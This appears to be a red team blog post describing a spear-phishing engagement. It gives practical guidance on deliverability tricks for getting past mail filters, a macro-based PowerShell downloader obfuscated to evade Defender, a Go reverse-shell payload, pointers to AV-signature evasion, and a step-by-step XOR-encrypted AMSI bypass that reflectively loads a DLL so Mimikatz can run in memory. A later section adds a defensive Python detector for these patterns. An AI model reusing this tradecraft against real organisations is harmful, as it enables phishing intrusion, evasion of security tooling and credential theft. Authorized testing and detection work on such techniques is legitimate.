Red Team Techniques: Gaining access on an external engagement through spear-phishing
[Image: meterpreter.png]

There have been a lot of posts about crafting red team phishing campaigns, and most are incomplete. Today, we're going to walk through one of our recent external engagements from start to initial access, including domain creation, crafting phishing content, considerations for bypassing spam filters and email gateways, generating undetectable payloads, and bypassing Windows protections such as AMSI. We compiled a list of references at the bottom of this post.

Customer names and related information have been anonymized for obvious reasons. Depending on the sophistication and length of your red team engagement, you will need to gauge how much time and effort you spend on each of the items below.


Deliverability considerations:
  • Origin of mail:
    • Sending mail from localhost (e.g. your laptop) using a script.
    • IP reputation in headers.
    • Recently commissioned VPS with no sender history.
  • Sending domain reputation and domain age (amount of time between domain creation and the date of your campaign).
  • Link reputation and domain age.
  • Use a high-reputation sender, like Mailchimp or Sendgrid. Verify your domain with these providers so you can send emails "From:" your domain, as opposed to "Delivered-by Mailchimp for XXX".
  • Match the Return-Path for targeted emails.
  • Configure SPF, DKIM, and DMARC.
  • Timing & frequency:
    • If you send 100 emails at once from a low-reputation IP, you'll almost certainly get flagged as spam.
  • Valid SSL certs on sending domains and on links in the email.
  • Broken links.
  • Amount of HTML content.
Engagement
We generally approach phishing campaigns in three ways during an engagement:
  1. Targeted campaign against specific individuals of interest.

  2. Mass campaign against all users gleaned from the recon phase. (There are lots of great resources for recon and creating a targetable list of email addresses. Here are a few: OSINT Resources for 2019, theHarvester, datasploit, and awesome-osint on Github.)

  3. Submission via forms on target company's website, usually by setting up a fake company.
Each campaign uses a different domain so as not to impact the reputation or deliverability of other campaigns. Campaigns should begin from most subtle to most egregious. Should the company recognize they are being targeted, your future attempts could be more heavily scrutinized. We often use Mailchimp for delivery after verifying our domain and setting up email authentication. We've also had success with a G Suite account and SMTP authentication using custom scripts.
Due to time constraints (20 hours), we chose options two and three above. For both campaigns, we used a word doc with macros.
Recon
An MX lookup of our target company showed they were using G Suite, so we could test campaigns against mock G Suite accounts to ensure we'd get through their protections.
Code:
dig target.com MX

Google does a decent job at filtering malicious attachments, so in campaign one we hosted it on a high reputation domain and in campaign two we hosted it on our own domain.
Campaign prep: generating a word doc macro and payload
For this engagement, we used a malicious word doc with macros. We leveraged unicorn (thanks @hackingdave) to generate a powershell macro to download/exec our payload, and made a slight modification to bypass Defender at the time:
Code:
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "

We used hershell for our payload, an awesome lightweight stage 1 written in Go, whose x86 build was undetectable at the time. If your payload is getting flagged, you have options for obfuscation and encryption, and can also manually locate and bypass AV signatures if you know your target environment, using something like dsplit. Here are some resources:
https://resources.infosecinstitute.com/antivirus-evasion-tools/
https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1
http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
Metasploit 5 was also recently released with built-in payload encryption and evasion payloads, but we haven't had a chance to use them.

AMSI bypass

We anticipated the need to run custom powershell payloads, so we'd have to bypass a recent Windows protection called AMSI. According to Microsoft, AMSI stands for Antimalware Scan Interface, and it allows programs (like powershell) to submit content to a scanning engine prior to execution. Credit goes to CyberArk for their initial research into bypassing AMSI, and to Andre Marques for his writeup. We were able to adapt their implementations, which were getting flagged by Microsoft at the time, to bypass AMSI using XOR encryption.


Code:
1. Re-compile the AMSI Bypass DLL
2. Convert the binary to base64
   $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\\bypass.dll"))
3. XOR encrypt
   foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
4. Print encrypted buf as a byte array
   foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }

On Target

1. Split encrypted buf due to powershell line limit lengths
2. Concat the buf
   $xorencrypted = $a + $b + $c + $d + $e + $f + $g
3. Decrypt the buf
   foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
4. Get buf as base64
   $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
5. Load the DLL using reflection
   function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
6. Call the bypass method
   Bypass-AMCEE

This allows us to execute powershell payloads again in memory, such as Mimikatz.
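From the defender's side, here is an added example (not code from the post, from Sublime, or from the referenced tools) of how the two tricks described above can be caught in macro text and PowerShell script-block logs: the "powershell.exe" literal split into `"po" & "w" & ...` fragments, and a script block that XOR-decodes a buffer with `-bxor` and then loads it through `[Reflection.Assembly]::Load`. The sample inputs are constructed and the indicator names are my own.

```python
import re

# Constructed samples mimicking the patterns in the post: a macro that
# rebuilds "powershell.exe" from fragments, a script block that XOR-decodes
# a buffer and reflectively loads it, and a benign macro as a control.
SAMPLES = {
    "macro.vba": 'cmd = "po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "',
    "scriptblock.ps1": ('foreach($byte in $xorencrypted){ $decrypted += $byte -bxor 1 }\n'
                        '[Reflection.Assembly]::Load([Convert]::FromBase64String($b64)) | Out-Null'),
    "benign.vba": 'MsgBox "Report generated: " & Format(Now, "yyyy-mm-dd")',
}

# Two adjacent string literals joined by VBA's & operator, e.g. "po" & "w".
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def normalize_vba(text: str) -> tuple[str, int]:
    """Collapse chained literal concatenations into a single literal.

    Returns the rewritten text and the number of joins collapsed; a high
    join count is itself a useful obfuscation signal.
    """
    joins = 0
    while True:
        text, n = _CONCAT.subn(r'"\1\2"', text)
        if n == 0:
            return text, joins
        joins += n


def scan(text: str) -> list[str]:
    """Return detection tags for one macro or script-block sample."""
    findings = []
    normalized, joins = normalize_vba(text)
    raw_l, norm_l = text.lower(), normalized.lower()
    # Interpreter name only visible after the literal fragments are reassembled.
    if "powershell.exe" in norm_l and "powershell.exe" not in raw_l:
        findings.append("obfuscated-interpreter-name")
    if joins >= 4:
        findings.append("excessive-string-concatenation")
    # XOR decode loop feeding an in-memory assembly load.
    if "-bxor" in raw_l and "reflection.assembly]::load" in raw_l:
        findings.append("xor-decoded-reflective-load")
    return findings


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name}: {scan(sample) or 'clean'}")
```

The same normalization step applied to PowerShell script-block logs (event 4104) works against `+`-joined string fragments if the regex operator is swapped accordingly.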

You can grab a working AMSI bypass (as of 02/13/19) here.

Read more in below blog link:
https://blog.sublimesecurity.com/red-tea...-phishing/
AMSI bypass Github link